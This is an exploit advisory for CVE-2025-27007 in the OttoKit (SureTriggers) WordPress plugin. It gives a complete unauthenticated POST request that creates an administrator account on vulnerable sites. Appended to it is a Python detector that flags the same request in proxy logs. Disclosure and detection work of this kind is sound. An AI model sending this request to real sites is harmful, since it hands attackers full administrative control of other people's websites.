# Exploit Title: SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation
# Date: 2025-05-7
# Exploit Author: Abdualhadi khalifa (https://x.com/absholi7ly/)
# Affected Versions: All versions of OttoKit (SureTriggers) ≤ 1.0.82.
Conditions for Exploitation
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#conditions-for-exploitation>

The vulnerability can be exploited under the following circumstances:

1. OttoKit must be installed and activated on the target WordPress site.
2. The plugin is *uninitialized* (e.g., no API key or "secret_key" is set in the database).
3. The target site exposes the REST API endpoint '/wp-json/sure-triggers/v1/automation/action'.

------------------------------

HTTP Request

The following request targets the /wp-json/sure-triggers/v1/automation/action endpoint to create an administrator account:

POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email]=attacker@example.com&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists
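A defender-side check over captured requests (e.g. from a reverse proxy or WAF log that records headers and bodies), added here as an example that is not part of the original advisory: it flags a POST to the automation/action endpoint whose St-Authorization header is empty or absent and whose body asks for a user to be created, and notes an administrator role for triage. The sample requests, hostnames and token value are constructed.

```python
from urllib.parse import parse_qs
ENDPOINT = "/wp-json/sure-triggers/v1/automation/action"  # endpoint from the advisory

def parse_raw_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body);
    header names are lower-cased for case-insensitive lookup."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def classify_request(raw: str) -> dict:
    """Flag the CVE-2025-27007 pattern: a POST to the automation/action
    endpoint with an empty or absent St-Authorization header that asks
    for a user to be created. An administrator role is noted for triage."""
    method, path, headers, body = parse_raw_request(raw)
    result = {"path": path, "suspicious": False, "reasons": []}
    if method != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return result  # other endpoints are out of scope for this check
    no_auth = not headers.get("st-authorization")
    params = parse_qs(body, keep_blank_values=True)
    creates_user = params.get("type_event") == ["create_user_if_not_exists"]
    if no_auth:
        result["reasons"].append("empty or missing St-Authorization header")
    if creates_user:
        result["reasons"].append("type_event=create_user_if_not_exists")
    if params.get("selected_options[role]") == ["administrator"]:
        result["reasons"].append("requested role is administrator")
    result["suspicious"] = no_auth and creates_user
    return result

# Constructed sample mirroring the advisory's request (values are made up).
EXPLOIT_REQUEST = (
    "POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "St-Authorization:\r\n\r\n"
    "selected_options[user_name]=new_admin&selected_options[role]=administrator"
    "&type_event=create_user_if_not_exists"
)

# Constructed benign sample: same endpoint, populated token, no user creation.
LEGIT_REQUEST = (
    "POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1\r\n"
    "St-Authorization: placeholder-secret-key\r\n\r\n"
    "type_event=update_post&selected_options[post_id]=42"
)
```

Because the check keys on the empty header together with the user-creation event, a site whose plugin has been initialized with a secret key and that sends a populated St-Authorization header is not flagged.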